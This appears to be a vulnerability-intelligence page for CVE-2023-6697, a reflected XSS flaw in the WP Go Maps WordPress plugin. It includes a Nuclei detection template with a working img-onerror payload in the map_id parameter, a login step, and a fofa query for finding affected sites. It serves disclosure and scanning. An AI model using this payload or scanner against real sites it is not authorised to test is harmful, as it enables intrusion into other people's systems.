WP Go Maps plugin is vulnerable to Cross-Site Scripting due to insufficient input validation.
Reporter | Title | Published | Views | Family All 7 |
---|---|---|---|---|
Prion | Cross site scripting | 24 Jan 202414:15 | – | prion |
NVD | CVE-2023-6697 | 24 Jan 202414:15 | – | nvd |
WPVulnDB | WP Go Maps (formerly WP Google Maps) < 9.0.29 - Unauthenticated Reflected Cross-Site Scripting | 24 Jan 202400:00 | – | wpvulndb |
Cvelist | CVE-2023-6697 | 24 Jan 202413:52 | – | cvelist |
CVE | CVE-2023-6697 | 24 Jan 202414:15 | – | cve |
Patchstack | WordPress WP Go Maps Plugin <= 9.0.28 is vulnerable to Cross Site Scripting (XSS) | 24 Jan 202400:00 | – | patchstack |
Wordfence Blog | Wordfence Intelligence Weekly WordPress Vulnerability Report (January 22, 2024 to January 28, 2024) | 1 Feb 202415:49 | – | wordfence |
id: CVE-2023-6697
info:
name: WP Go Maps (formerly WP Google Maps) < 9.0.29 - Cross-Site Scripting
author: iamnoooob,ritikchaddha
severity: medium
description: |
The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the map id parameter in all versions up to, and including, 9.0.28 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
reference:
- https://wpscan.com/vulnerability/ffcebd9d-82fe-4a30-8ad6-cf6c03753d4c/
- https://nvd.nist.gov/vuln/detail/CVE-2023-6697
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-6697
cwe-id: CWE-79
cpe: cpe:2.3:a:wpgmaps:wp_go_maps:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
fofa-query: body="/wp-content/plugins/wp-google-maps"
vendor: wpgmaps
product: wp_go_maps
tags: cve,cve2023,wp,wp-plugin,wordpress,xss,wp-go-maps,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1aa%27\"><img+src%3Dx+onerror%3Dalert%28document.domain%29> HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src="x" onerror="alert(document.domain)">'
- 'Map Alignment</legend>'
condition: and
- type: word
part: content_type
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a0048304602210088ee1333cf9f7204962b623124549d77bf2394afe213862f590e2a0ca3c04ed9022100f4d9ea4ac68af2558ec4a219e27dc022239472639c5b833ab23818237355b14c:922c64590222798bb761d5b6d8e72950
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo